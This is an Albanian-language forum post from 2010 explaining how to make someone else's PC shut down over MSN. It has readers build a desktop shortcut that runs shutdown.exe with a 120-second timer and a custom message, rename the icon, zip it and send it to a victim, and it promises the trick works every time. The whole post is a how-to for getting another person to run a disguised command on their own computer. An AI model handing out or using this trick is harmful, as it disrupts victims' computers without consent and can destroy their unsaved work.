Miresevini ne forum ju urojm te kaloni çaste te bukura dhe kenaqesi pa fund...
Would you like to react to this message? Create an account in a few clicks or log in to continue.
Miresevini ne forum ju urojm te kaloni çaste te bukura dhe kenaqesi pa fund...

Powered By:Valmir Shala
 
ForumForum  PortalPortal  Latest imagesLatest images  KërkoKërko  RegjistrohuRegjistrohu  identifikimi  

 

 Si t'ja fikim dikujna Pc prej MSN

Shko poshtë 
AutoriMesazh
noah~hack
Admin
noah~hack


Numri i postimeve : 275
Join date : 24/01/2010
Age : 29

Si t'ja fikim dikujna Pc prej MSN Empty
MesazhTitulli: Si t'ja fikim dikujna Pc prej MSN   Si t'ja fikim dikujna Pc prej MSN EmptyMon May 03, 2010 8:01 am

Ne fillim Krijojm nje file

Shkojm Desktop , klikojme new - shortcut , tek type e qesim kete:

Kodet PHP:

%windir%system32shutdown.exe -s -t 120 -c "Wildstopper Like This"

Ktu tek "WildStopper Like This" mundeni me ndryshu mesazhin qe doni te paraqitet, pastaj klikojme finish.Nqs doni poashtu mundeni mja bo raname emrin ikones.

Pastaj krijohet nje ikon ne desktop , ate e bojm .zip , edhe ja dergojme .

Funksionon 100%
Mbrapsht në krye Shko poshtë
http://www.v-shala.tk
 
Si t'ja fikim dikujna Pc prej MSN
Mbrapsht në krye 
Faqja 1 e 1
 Similar topics
-
» Video Prej Youtube
» Si Me Marr Muzik Prej Youtube me MB Shum TE Vogel
» Si te ja marresh shokut te gjitha te dhanunat e kompjuterit prej msn new

Drejtat e ktij Forumit:Ju nuk mund ti përgjigjeni temave të këtij forumi
Miresevini ne forum ju urojm te kaloni çaste te bukura dhe kenaqesi pa fund...  :: Tutoriale&Mesime :: Tutoriale&Mesime-
Kërce tek: